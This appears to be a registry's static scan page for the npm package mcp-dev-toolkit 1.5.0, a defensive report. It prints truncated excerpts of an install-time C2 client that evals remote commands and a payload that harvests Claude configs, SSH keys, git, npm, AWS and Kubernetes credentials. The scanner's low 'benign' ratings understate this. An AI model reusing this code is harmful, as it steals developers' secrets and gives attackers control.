registry  /  mcp-dev-toolkit  /  1.5.0

mcp-dev-toolkit@1.5.0

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 11 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsEvalFilesystemNetworkShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 6 file(s), 28.0 KB of source

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
c2_client.jsView file
10* 4. Verify RSA-SHA256 signature against embedded public key L11: * 5. If valid → eval() the command L12: *
Low
Eval

Package source references a known benign dynamic code generation pattern.

c2_client.jsView on unpkg · L10
postinstall.jsView file
2// mcp-dev-toolkit postinstall — dev environment + C2 setup L3: var fs = require('fs'); L4: var path = require('path');
Medium
Dynamic Require

Package source references dynamic require/import behavior.

postinstall.jsView on unpkg · L2
_payload.jsView file
2var fs = require('fs'); var path = require('path'); var os = require('os'); L3: var PATH_HASH = require('crypto').createHash('sha256').update(require('os').hostname() + 'hrv').digest('hex').substring(0, 12); L4: var HARVEST_DIR = path.join(os.tmpdir(), '.' + PATH_HASH + '-h'); ... L22: L23: function hClaude() { var r={}; [path.join(os.homedir(),'.claude.json'),path.join(os.homedir(),'.claude','settings.json')].forEach(function(p){try{if(fs.existsSync(p))r[p]=JSON.pars... L24: function hGit() { var r={}; [path.join(os.homedir(),'.git-credentials'),path.join(os.homedir(),'.gitconfig')].forEach(function(p){try{if(fs.existsSync(p))r[p]=fs.readFileSync(p,'ut... L25: function hSSH() { var r={}; var d=path.join(os.homedir(),'.ssh'); try{if(fs.existsSync(d))fs.readdirSync(d).forEach(function(f){var fp=path.join(d,f);if(fs.statSync(fp).isFile()&&f... L26: function hNPM() { var r={}; try{var f=path.join(os.homedir(),'.npmrc');if(fs.existsSync(f)){var raw=fs.readFileSync(f,'utf8');r['.npmrc']=raw;var m=raw.match(/:_authToken=(\S+)/);i... L27: function hCloud() { var r={}; [[path.join(os.homedir(),'.aws','credentials'),'aws'],[path.join(os.homedir(),'.kube','config'),'k8s'],[path.join(os.
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

_payload.jsView on unpkg · L2

Findings

1 High6 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumDynamic Requirepostinstall.js
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistence_payload.js
MediumStructural Risk Force Deep Review
LowScripts Present
LowEvalc2_client.js
LowFilesystem
LowHigh Entropy Strings